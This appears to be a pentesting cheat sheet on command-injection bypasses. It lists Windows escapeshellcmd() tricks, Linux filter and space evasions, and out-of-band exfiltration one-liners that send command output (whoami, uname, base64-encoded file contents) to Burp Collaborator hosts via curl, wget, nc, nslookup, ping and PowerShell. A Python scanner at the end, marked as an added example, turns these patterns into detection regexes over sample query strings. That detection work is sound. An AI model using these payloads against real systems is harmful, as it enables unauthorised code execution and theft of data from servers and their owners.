
RCE bypass summary

Windows

Bypassing escapeshellcmd()

  • %1a (PHP version <= 5.2.5): multibyte character

    dir ../ %1a| whoami
  • %0a: newline

    dir ../ %0a | whoami

Out-of-band (OOB) data exfiltration

  • HTTP

    for /F %x in ('whoami') do start http://402h4pmr24p090cenlc9bmeao1uvik.burpcollaborator.net/%x
  • DNS

    for /F %x in ('whoami') do nslookup %x.qkeimef2pqn9xr5stc1k9aqd046vuk.burpcollaborator.net
    for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net
    for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net

If the output contains spaces or other special characters, the data may be truncated; if PowerShell is available, use it to base64-encode the value first:

for /F %x in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://424h6por44r0b0eeple9dmgaq1wwukj.burpcollaborator.net/'+$a);

Linux

Bypassing blacklists

  • String concatenation

    a=l;b=s;$a$b  --> ls
    a=c;b=at;c=t;d=xt;$a$b $c$d  -->  cat txt
    a=c;b=at;c=t;d=xt;$a$b ${c}${d} -->  cat txt
  • Extracting characters from another file

    echo `expr substr $(awk NR==1 1.php) 1 1`
  • Extracting characters from an environment variable

    echo ${SHELLOPTS:1:1}
  • Re-running the previous command

    !!

Bypassing spaces

cat<>txt
{ls,-la}
{ls,-l,-a}
cat${IFS}txt

IFS (the shell's internal field separator) is a global variable whose default value is whitespace.

a=$'\x20txt';cat$a

Using a tab character

http://127.0.0.1/info.php?c=ls%09-la

Out-of-band data exfiltration

curl l5rzvd9oe86ejd54tlyc85mmndt3hs.burpcollaborator.net/?`uname`

ping -c 1 `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

wget `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

nc `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

telnet `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

ssh `uname`.zy1fx36gu90b5mttapk07xjad1jr7g.burpcollaborator.net

...

base64 encoding:

curl http://alznpv7xnaa6u6xk8rxfwszg97f03p.burpcollaborator.net/?`cat txt|base64`

curl http://alznpv7xnaa6u6xk8rxfwszg97f03p.burpcollaborator.net/?$(cat txt|base64)
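As an added example (not part of the original post), the scanner below turns the Windows and Linux tricks listed above into detection signatures and runs them over URL-encoded query strings as a web server would log them. The `c` parameter name, the `oob.example.net` host and the sample queries are constructed; only the patterns come from the page.

```python
import re
from urllib.parse import unquote_plus

# One regex per obfuscation / exfiltration trick listed above; matching runs on
# the URL-decoded parameter value, so %09, %1a and %24 are seen as tab, 0x1a, $.
INDICATORS = {
    "ifs_as_space": re.compile(r"\$\{?IFS\}?"),
    "brace_expansion": re.compile(r"\{[\w./-]+,[^}]*\}"),
    "tab_or_redirect_as_space": re.compile(r"[A-Za-z]+(?:\t|<>)[\w./-]"),
    "ansi_c_quoted_space": re.compile(r"\$'\\x20"),
    "assembled_command": re.compile(r"(?:\b\w=\w+;){2,}\$\w"),
    "cmd_subst_in_hostname": re.compile(r"(?:`[^`]+`|\$\([^)]+\))\.[\w.-]+\.[a-z]{2,}"),
    "cmd_subst_in_query": re.compile(r"\?(?:`[^`]+`|\$\([^)]+\))"),
    "windows_for_loop_exfil": re.compile(
        r"for /F .*in \('[^']+'\) do (?:nslookup|ping|start|powershell)", re.I),
    "control_char_separator": re.compile(r"[\x1a\n]\s*\|?\s*[A-Za-z]"),
}

# Constructed sample query strings: the page's payloads URL-encoded as logged,
# with the collaborator host replaced by a placeholder; last entry is benign.
SAMPLE_QUERIES = [
    "c=ls%09-la",
    "c=cat${IFS}txt",
    "c={ls,-la}",
    "c=a%3Dl%3Bb%3Ds%3B%24a%24b",
    "c=ping+-c+1+%60uname%60.oob.example.net",
    "c=curl+http://oob.example.net/?%24(cat+txt|base64)",
    "c=dir+../+%1a|+whoami",
    "c=for+/F+%25x+in+('whoami')+do+nslookup+%25x.oob.example.net",
    "q=hello+world",
]

def find_injection_indicators(param_value: str) -> list[str]:
    """Return the names of every indicator that fires on one raw parameter value."""
    decoded = unquote_plus(param_value)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_queries(queries):
    """Map each query string to the indicators found in any of its parameter values."""
    # Split only on '&' so a ';' inside a value (a=l;b=s;$a$b) stays intact.
    findings = {}
    for query in queries:
        hits = []
        for part in query.split("&"):
            _key, _, value = part.partition("=")
            for name in find_injection_indicators(value):
                if name not in hits:
                    hits.append(name)
        if hits:
            findings[query] = hits
    return findings
```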